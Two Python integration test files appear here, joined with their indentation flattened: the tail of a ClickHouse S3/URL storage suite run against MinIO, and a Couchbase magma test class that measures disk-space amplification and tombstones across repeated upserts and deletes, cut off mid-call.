def test_custom_auth_headers_exclusion(started_cluster):
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"SELECT * FROM s3('http://resolver:8080/{started_cluster.minio_restricted_bucket}/restricteddirectory/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
with pytest.raises(helpers.client.QueryRuntimeException) as ei:
result = run_query(instance, get_query)
print(result)
assert ei.value.returncode == 243
assert 'Forbidden Error' in ei.value.stderr
def test_infinite_redirect(started_cluster):
bucket = "redirected"
table_format = "column1 UInt32, column2 UInt32, column3 UInt32"
filename = "test.csv"
get_query = f"select * from s3('http://resolver:{started_cluster.minio_redirect_port}/{bucket}/{filename}', 'CSV', '{table_format}')"
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
exception_raised = False
try:
run_query(instance, get_query)
except Exception as e:
assert str(e).find("Too many redirects while trying to access") != -1
exception_raised = True
finally:
assert exception_raised
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz"),
])
def test_storage_s3_get_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_get_gzip.{extension}"
name = f"test_get_gzip_{extension}"
data = [
"Sophia Intrieri,55",
"Jack Taylor,71",
"Christopher Silva,66",
"Clifton Purser,35",
"Richard Aceuedo,43",
"Lisa Hensley,31",
"Alice Wehrley,1",
"Mary Farmer,47",
"Samara Ramirez,19",
"Shirley Lloyd,51",
"Santos Cowger,0",
"Richard Mundt,88",
"Jerry Gonzalez,15",
"Angela James,10",
"Norman Ortega,33",
""
]
run_query(instance, f"DROP TABLE IF EXISTS {name}")
buf = io.BytesIO()
compressed = gzip.GzipFile(fileobj=buf, mode="wb")
compressed.write(("\n".join(data)).encode())
compressed.close()
put_s3_file_content(started_cluster, bucket, filename, buf.getvalue())
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["565"]
run_query(instance, f"DROP TABLE {name}")
def test_storage_s3_get_unstable(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "column1 Int64, column2 Int64, column3 Int64, column4 Int64"
get_query = f"SELECT count(), sum(column3), sum(column4) FROM s3('http://resolver:8081/{started_cluster.minio_bucket}/test.csv', 'CSV', '{table_format}') FORMAT CSV"
result = run_query(instance, get_query)
assert result.splitlines() == ["500001,500000,0"]
def test_storage_s3_put_uncompressed(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = "test_put_uncompressed.bin"
name = "test_put_uncompressed"
data = [
"'Gloria Thompson',99",
"'Matthew Tang',98",
"'Patsy Anderson',23",
"'Nancy Badillo',93",
"'Roy Hunt',5",
"'Adam Kirk',51",
"'Joshua Douds',28",
"'Jolene Ryan',0",
"'Roxanne Padilla',50",
"'Howard Roberts',41",
"'Ricardo Broughton',13",
"'Roland Speer',83",
"'Cathy Cohan',58",
"'Kathie Dawson',100",
"'Gregg Mcquistion',11",
]
run_query(instance, "CREATE TABLE {} (name String, id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, filename))
run_query(instance, "INSERT INTO {} VALUES ({})".format(name, "),(".join(data)))
run_query(instance, "SELECT sum(id) FROM {}".format(name)).splitlines() == ["753"]
uncompressed_content = get_s3_file_content(started_cluster, bucket, filename)
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 753
@pytest.mark.parametrize("extension,method", [
pytest.param("bin", "gzip", id="bin"),
pytest.param("gz", "auto", id="gz")
])
def test_storage_s3_put_gzip(started_cluster, extension, method):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
filename = f"test_put_gzip.{extension}"
name = f"test_put_gzip_{extension}"
data = [
"'Joseph Tomlinson',5",
"'Earnest Essary',44",
"'Matha Pannell',24",
"'Michael Shavers',46",
"'Elias Groce',38",
"'Pamela Bramlet',50",
"'Lewis Harrell',49",
"'Tamara Fyall',58",
"'George Dixon',38",
"'Alice Walls',49",
"'Paula Mais',24",
"'Myrtle Pelt',93",
"'Sylvia Naffziger',18",
"'Amanda Cave',83",
"'Yolanda Joseph',89"
]
run_query(instance, f"""CREATE TABLE {name} (name String, id UInt32) ENGINE = S3(
'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{filename}',
'CSV',
'{method}')""")
run_query(instance, f"INSERT INTO {name} VALUES ({'),('.join(data)})")
run_query(instance, f"SELECT sum(id) FROM {name}").splitlines() == ["708"]
buf = io.BytesIO(get_s3_file_content(started_cluster, bucket, filename, decode=False))
f = gzip.GzipFile(fileobj=buf, mode="rb")
uncompressed_content = f.read().decode()
assert sum([ int(i.split(',')[1]) for i in uncompressed_content.splitlines() ]) == 708
def test_truncate_table(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "truncate"
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3('http://{}:{}/{}/{}', 'CSV')".format(
name, started_cluster.minio_ip, MINIO_INTERNAL_PORT, bucket, name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
instance.query("TRUNCATE TABLE {}".format(name))
minio = started_cluster.minio_client
timeout = 30
while timeout > 0:
if len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0:
return
timeout -= 1
time.sleep(1)
assert(len(list(minio.list_objects(started_cluster.minio_bucket, 'truncate/'))) == 0)
assert instance.query("SELECT * FROM {}".format(name)) == ""
def test_predefined_connection_configuration(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
name = "test_table"
instance.query("drop table if exists {}".format(name))
instance.query("CREATE TABLE {} (id UInt32) ENGINE = S3(s3_conf1, format='CSV')".format(name))
instance.query("INSERT INTO {} SELECT number FROM numbers(10)".format(name))
result = instance.query("SELECT * FROM {}".format(name))
assert result == instance.query("SELECT number FROM numbers(10)")
result = instance.query("SELECT * FROM s3(s3_conf1, format='CSV', structure='id UInt32')")
assert result == instance.query("SELECT number FROM numbers(10)")
result = ""
def test_url_reconnect_in_the_middle(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_format = "id String, data String"
filename = "test_url_reconnect_{}.tsv".format(random.randint(0, 1000))
instance.query(f"""insert into table function
s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
select number, randomPrintableASCII(number % 1000) from numbers(1000000)""")
with PartitionManager() as pm:
pm_rule_reject = {'probability': 0.02, 'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'REJECT --reject-with tcp-reset'}
pm_rule_drop_all = {'destination': instance.ip_address, 'source_port': started_cluster.minio_port, 'action': 'DROP'}
pm._add_rule(pm_rule_reject)
def select():
global result
result = instance.query(
f"""select sum(cityHash64(x)) from (select toUInt64(id) + sleep(0.1) as x from
url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{filename}', 'TSV', '{table_format}')
settings http_max_tries = 10, http_retry_max_backoff_ms=2000, http_send_timeout=1, http_receive_timeout=1)""")
assert(int(result) == 3914219105369203805)
thread = threading.Thread(target=select)
thread.start()
time.sleep(4)
pm._add_rule(pm_rule_drop_all)
time.sleep(2)
pm._delete_rule(pm_rule_drop_all)
pm._delete_rule(pm_rule_reject)
thread.join()
assert(int(result) == 3914219105369203805)
def test_seekable_formats(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"] # type: ClickHouseInstance
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} SELECT number, randomString(100) FROM numbers(5000000) settings s3_truncate_on_insert=1")
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM s3') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_seekable_formats_url(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_parquet', 'Parquet', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
table_function = f"s3(s3_orc, structure='a Int32, b String', format='ORC')"
exec_query_with_retry(instance, f"insert into table function {table_function} select number, randomString(100) from numbers(5000000) settings s3_truncate_on_insert=1")
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_orc', 'ORC', 'a Int32, b String')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 5000000)
instance.query("SYSTEM FLUSH LOGS")
result = instance.query(f"SELECT formatReadableSize(memory_usage) FROM system.query_log WHERE startsWith(query, 'SELECT count() FROM url') AND memory_usage > 0 ORDER BY event_time desc")
print(result[:3])
assert(int(result[:3]) < 200)
def test_empty_file(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
name = "empty"
url = f'http://{started_cluster.minio_ip}:{MINIO_INTERNAL_PORT}/{bucket}/{name}'
minio = started_cluster.minio_client
minio.put_object(bucket, name, io.BytesIO(b""), 0)
table_function = f"s3('{url}', 'CSV', 'id Int32')"
result = instance.query(f"SELECT count() FROM {table_function}")
assert(int(result) == 0)
def test_insert_with_path_with_globs(started_cluster):
instance = started_cluster.instances["dummy"]
table_function_3 = f"s3('http://minio1:9001/root/test_parquet*', 'minio', 'minio123', 'Parquet', 'a Int32, b String')"
instance.query_and_get_error(f"insert into table function {table_function_3} SELECT number, randomString(100) FROM numbers(500)")
def test_s3_schema_inference(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"insert into table function s3(s3_native, structure='a Int32, b String', format='Native') select number, randomString(100) from numbers(5000000)")
result = instance.query(f"desc s3(s3_native, format='Native')")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from s3(s3_native, format='Native')")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference engine=S3(s3_native, format='Native')")
result = instance.query(f"desc schema_inference")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference")
assert(int(result) == 5000000)
table_function = f"url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')"
result = instance.query(f"desc {table_function}")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from {table_function}")
assert(int(result) == 5000000)
instance.query(f"create table schema_inference_2 engine=URL('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')")
result = instance.query(f"desc schema_inference_2")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from schema_inference_2")
assert(int(result) == 5000000)
table_function = f"s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test_native', 'Native')"
result = instance.query(f"desc {table_function}")
assert result == "a\tInt32\t\t\t\t\t\nb\tString\t\t\t\t\t\n"
result = instance.query(f"select count(*) from {table_function}")
assert(int(result) == 5000000)
def test_overwrite(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_overwrite as {table_function}")
instance.query(f"truncate table test_overwrite")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(50) settings s3_truncate_on_insert=1")
instance.query_and_get_error(f"insert into test_overwrite select number, randomString(100) from numbers(100)")
instance.query(f"insert into test_overwrite select number, randomString(100) from numbers(200) settings s3_truncate_on_insert=1")
result = instance.query(f"select count() from test_overwrite")
assert(int(result) == 200)
def test_create_new_files_on_insert(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
table_function = f"s3(s3_parquet, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
instance.query(f"drop table test_multiple_inserts")
table_function = f"s3(s3_parquet_gz, structure='a Int32, b String', format='Parquet')"
instance.query(f"create table test_multiple_inserts as {table_function}")
instance.query(f"truncate table test_multiple_inserts")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(10) settings s3_truncate_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(20) settings s3_create_new_file_on_insert=1")
instance.query(f"insert into test_multiple_inserts select number, randomString(100) from numbers(30) settings s3_create_new_file_on_insert=1")
result = instance.query(f"select count() from test_multiple_inserts")
assert(int(result) == 60)
def test_format_detection(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"create table arrow_table_s3 (x UInt64) engine=S3(s3_arrow)")
instance.query(f"insert into arrow_table_s3 select 1")
result = instance.query(f"select * from s3(s3_arrow)")
assert(int(result) == 1)
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
instance.query(f"create table parquet_table_s3 (x UInt64) engine=S3(s3_parquet2)")
instance.query(f"insert into parquet_table_s3 select 1")
result = instance.query(f"select * from s3(s3_parquet2)")
assert(int(result) == 1)
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.parquet')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.parquet')")
assert(int(result) == 1)
def test_schema_inference_from_globs(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"insert into table function s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test1.jsoncompacteachrow', 'JSONCompactEachRow', 'x Nullable(UInt32)') select NULL")
instance.query(f"insert into table function s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test2.jsoncompacteachrow', 'JSONCompactEachRow', 'x Nullable(UInt32)') select 0")
url_filename = "test{1,2}.jsoncompacteachrow"
result = instance.query(f"desc url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{url_filename}')")
assert(result.strip() == 'c1\tNullable(Float64)')
result = instance.query(f"select * from url('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/{url_filename}')")
assert(sorted(result.split()) == ['0', '\\N'])
result = instance.query(f"desc s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test*.jsoncompacteachrow')")
assert(result.strip() == 'c1\tNullable(Float64)')
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test*.jsoncompacteachrow')")
assert(sorted(result.split()) == ['0', '\\N'])
def test_signatures(started_cluster):
bucket = started_cluster.minio_bucket
instance = started_cluster.instances["dummy"]
instance.query(f"create table test_signatures (x UInt64) engine=S3(s3_arrow)")
instance.query(f"truncate table test_signatures")
instance.query(f"insert into test_signatures select 1")
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'Arrow', 'x UInt64')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'minio', 'minio123')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'Arrow', 'x UInt64', 'auto')")
assert(int(result) == 1)
result = instance.query(f"select * from s3('http://{started_cluster.minio_host}:{started_cluster.minio_port}/{bucket}/test.arrow', 'minio', 'minio123', 'Arrow')")
assert(int(result) == 1)
|
magma_upserts.py
|
import copy
import threading
import time
from Cb_constants.CBServer import CbServer
import json as Json
from magma_basic_crud import BasicCrudTests
from remote.remote_util import RemoteMachineShellConnection
from sdk_client3 import SDKClient
class BasicUpsertTests(BasicCrudTests):
def test_update_n_times_new(self):
"""
Test Focus: Update items n times and
test space amplification
STEPS:
-- Update items n times (where n is calculated
from the fragmentation value)
-- Check space amplification
-- Repeat the above steps n times
-- After all iterations validate the data
Note: This test is written using the new doc loader
and targets 1% DGM
"""
self.log.info("test_update_n_times_new starts")
self.create_start = 0
self.create_end = self.init_items_per_collection
self.mutate = 0
self.log.info("Initial loading with new loader starts")
self.new_loader(wait=True)
self.sleep(60, "sleep after init loading in test")
disk_usage = self.get_disk_usage(
self.buckets[0], self.cluster.nodes_in_cluster)
self.disk_usage[self.buckets[0].name] = disk_usage[0]
self.log.info(
"For bucket {} disk usage after initial creation is {}MB\
".format(self.buckets[0].name,
self.disk_usage[self.buckets[0].name]))
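# Record the post-create disk usage as the baseline; every iteration below bounds
# space amplification against this value.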
count = 0
while count < self.test_itr:
self.log.info("Iteration == {}".format(count+1))
#################################################################
'''
STEP - 1, Update Items
'''
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.init_items_per_collection
self.create_perc = 0
self.read_perc = 0
self.delete_perc = 0
self.expiry_perc = 0
self.update_perc = 100
self.mutate += 1
self.new_loader(wait=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
#################################################################
'''
STEP - 2, Space Amplification Check
'''
msg = "Fragmentation value for {} stats exceeds\
the configured value"
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg.format("KV"))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.debug("usage at time {} is {}".format((time_end - time.time()), _res))
if _res < 2.5 * self.disk_usage[self.disk_usage.keys()[0]]:
break
msg = "Iteration= {}, Disk Usage = {}MB\
exceeds {} times from Actual disk usage = {}MB"
self.assertIs(_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(count+1, _res, 2.5,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
#######################################################################
'''
STEP - 3, Data Validation
'''
self.data_validation()
#########################################
def test_update_n_times(self):
"""
Test Focus: Update items n times and
test space amplification
STEPS:
-- Update items n times (where n is calculated
from the fragmentation value)
-- Check space amplification
-- Repeat the above steps n times
-- After all iterations validate the data
"""
self.log.info("test_update_n_times starts")
upsert_doc_list = self.get_fragmentation_upsert_docs_list()
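# List of doc counts to upsert per pass, derived from the configured fragmentation value.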
self.mutate = 0
count = 0
while count < self.test_itr:
self.log.info("Iteration == {}".format(count+1))
#################################################################
'''
STEP - 1, Update Items
'''
for itr in upsert_doc_list:
self.doc_ops = "update"
self.update_start = 0
self.update_end = itr
if self.rev_update:
self.update_start = -int(itr - 1)
self.update_end = 1
self.generate_docs(doc_ops="update")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
#################################################################
'''
STEP - 2, Space Amplification Check
'''
msg = "Fragmentation value for {} stats exceeds\
the configured value"
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg.format("KV"))
usage_factor = ((float(
self.num_items + sum(upsert_doc_list)
) / self.num_items) + 0.5)
self.log.debug("Disk usage factor = {}".format(usage_factor))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.debug("usage at time {} is {}".format((time_end - time.time()), _res))
if _res < usage_factor * self.disk_usage[self.disk_usage.keys()[0]]:
break
msg = "Iteration= {}, Disk Usage = {}MB\
exceeds {} times from Actual disk usage = {}MB"
self.assertIs(_res > usage_factor * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(count+1, _res, usage_factor,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
#######################################################################
'''
STEP - 3, Data Validation
'''
self.validate_data("update", self.gen_update)
if not self.windows_platform:
self.change_swap_space(self.cluster.nodes_in_cluster,
disable=False)
self.log.info("====test_update_n_times ends====")
def test_multi_update_delete(self):
"""
STEPS:
-- Update items x times
-- Check space amplification
-- Delete half of the items
-- Check space Amplification
-- Recreate deleted items
-- Check Space Amplification
-- Repeat above steps for n times
-- After all iterations validate the data
"""
self.log.info("==== test_multi_update_delete starts =====")
count = 0
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
msg = "{} Iteration= {}, Disk Usage = {}MB\
exceeds 2.5 times from Actual disk usage = {}MB"
self.mutate = 0
for i in range(self.test_itr):
self.log.info("Step 1, Iteration= {}".format(i+1))
#######################################################################
'''
STEP - 1, Update Items, update_itr times
'''
while count < self.update_itr:
self.doc_ops = "update"
self.update_start = 0
self.update_end = self.num_items
if self.rev_update:
self.update_start = -int(self.num_items - 1)
self.update_end = 1
self.log.info("Iteration {} , Upsert Iteration {}".
format(self.test_itr, count+1))
self.generate_docs(doc_ops="update")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.log.info("Waiting for ep-queues to get drained")
self.bucket_util._wait_for_stats_all_buckets(
self.cluster, self.cluster.buckets, timeout=3600)
###################################################################
'''
STEP - 2
-- Space Amplification check after each update iteration.
-- Data validation only for last update iteration
'''
self.log.info("Step 2, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Update Iteration-{}, Disk Usage at time {} is {}MB \
".format(count+1, time_end - time.time(), _res))
if _res < 2.5 * self.disk_usage[self.disk_usage.keys()[0]]:
break
self.assertIs(
_res > 2.5 * self.disk_usage[self.disk_usage.keys()[0]],
False, msg.format("update", count+1, _res,
self.disk_usage[self.disk_usage.keys()[0]]))
count += 1
self.update_itr += self.update_itr
if i+1 == self.test_itr:
self.validate_data("update", self.gen_update)
###################################################################
'''
STEP - 3
-- Delete half of the docs.
'''
self.log.info("Step 3, Iteration {}".format(i+1))
self.doc_ops = "delete"
self.delete_start = 0
self.delete_end = self.num_items//2
if self.rev_del:
self.delete_start = -int(self.num_items//2 - 1)
self.delete_end = 1
self.generate_docs(doc_ops="delete")
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 4
-- Space Amplification Check after deletion.
'''
self.sleep(60, "sleep before checking fragmentation")
self.log.info("Step 4, Iteration {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
time_end = time.time() + 60 * 10
while time.time() < time_end:
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Delete Iteration-{}, Disk Usage at time {} is {}MB \
".format(i+1, time_end - time.time(), _res))
if _res < 2.5 * self.disk_usage[self.disk_usage.keys()[0]]:
break
self.assertIs(
_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format(
"delete", i+1, _res,
self.disk_usage[self.disk_usage.keys()[0]]))
self.bucket_util._run_compaction(self.cluster, number_of_times=1)
ts = self.get_tombstone_count_key(self.cluster.nodes_in_cluster)
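# Expected tombstones: half the items deleted per iteration, kept on
# (num_replicas + 1) copies, accumulated across iterations.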
expected_ts_count = (self.items // 2)*(self.num_replicas+1)*(count+1)
self.log.info("Iterations - {}, Actual tombstones == {} expected_ts_count == {}".format(i+1, ts, expected_ts_count))
self.sleep(60, "sleep after triggering full compaction")
expected_tombstone_size = float(expected_ts_count * (self.key_size+ 64)) / 1024 / 1024
disk_usage_after_compaction = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)[0]
expected_size = 1 * self.disk_usage[self.disk_usage.keys()[0]] + expected_tombstone_size
self.log.info("Iteration--{}, disk usage after compaction == {}, expected_disk_size == {} ".
format(i+1, disk_usage_after_compaction, expected_size))
self.assertTrue(disk_usage_after_compaction <= expected_size ,
"Disk size after compaction == {}, exceeds expected size == {}".
format(disk_usage_after_compaction, expected_size))
###################################################################
'''
STEP - 5
-- ReCreation of docs.
'''
self.log.info("Step 5, Iteration= {}".format(i+1))
self.gen_create = copy.deepcopy(self.gen_delete)
self.doc_ops = "create"
_ = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=True)
self.bucket_util._wait_for_stats_all_buckets(self.cluster,
self.cluster.buckets,
timeout=3600)
self.bucket_util.verify_stats_all_buckets(self.cluster,
self.num_items)
###################################################################
'''
STEP - 6
-- Space Amplification Check after Recreation.
'''
self.log.info("Step 6, Iteration= {}".format(i+1))
_result = self.check_fragmentation_using_magma_stats(
self.buckets[0],
self.cluster.nodes_in_cluster)
self.assertIs(_result, True,
msg_stats.format("magma"))
_r = self.check_fragmentation_using_bucket_stats(
self.buckets[0], self.cluster.nodes_in_cluster)
self.assertIs(_r, True,
msg_stats.format("KV"))
disk_usage = self.get_disk_usage(self.buckets[0],
self.cluster.nodes_in_cluster)
_res = disk_usage[0]
self.log.info("Create Iteration{}, Disk Usage= {}MB \
".format(i+1, _res))
self.assertIs(_res > 2.5 * self.disk_usage[
self.disk_usage.keys()[0]],
False, msg.format("Create", _res, i+1,
self.disk_usage[self.disk_usage.keys()[0]]))
###################################################################
'''
STEP - 7
-- Validate data
-- Data validation is only for the creates in last iterations.
'''
self.log.info("Step 7, Iteration= {}".format(i+1))
self.validate_data("create", self.gen_create)
self.log.info("====test_multiUpdate_delete ends====")
def test_update_rev_update(self):
"""
STEPS:
-- Update num_items // 2 items.
-- Reverse update remaining num_items // 2 items.
-- If next_half is false, skip the above step
-- and instead reverse-update the items from the first point
-- Check space amplification
-- Repeat above steps x times
-- Delete all the items
-- Check space Amplification
-- Recreate deleted items
-- Check Space Amplification
-- Repeat above steps for n times
-- After all iterations validate the data
"""
self.log.info("==== test_update_rev_update starts =====")
msg_stats = "Fragmentation value for {} stats exceeds\
the configured value"
msg = "{} Iteration= {}, Disk Usage = {}MB\
exceeds {} times from Actual disk usage = {}MB"
count = 0
mutated = 1
for i in range(self.test_itr):
self.log.debug("Step 1, Iteration= {}".format(i+1))
#######################################################################
'''
STEP - 1, Update Items, update_itr times
-- Update n // 2 items
-- If self.next_half is true
-- Update remaining n//2 items
-- Else, again update items in
reverse order in first point
'''
while count < self.update_itr:
tasks_info = dict()
self.doc_ops = "update"
self.gen_update = self.genrate_docs_basic(0, self.num_items //2,
mutate=mutated)
tem_tasks_info = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=False)
tasks_info.update(tem_tasks_info.items())
if self.next_half:
start = - (self.num_items - 1)
end = - (self.num_items // 2 - 1)
self.gen_update = self.genrate_docs_basic(start, end,
mutate=mutated)
tem_tasks_info = self.loadgen_docs(self.retry_exceptions,
self.ignore_exceptions,
_sync=False)
tasks_info.update(tem_tasks_info.items())
for task in tasks_info:
self.task_manager.get_task_result(task)
self.bucket_util.verify_doc_op_task_exceptions(
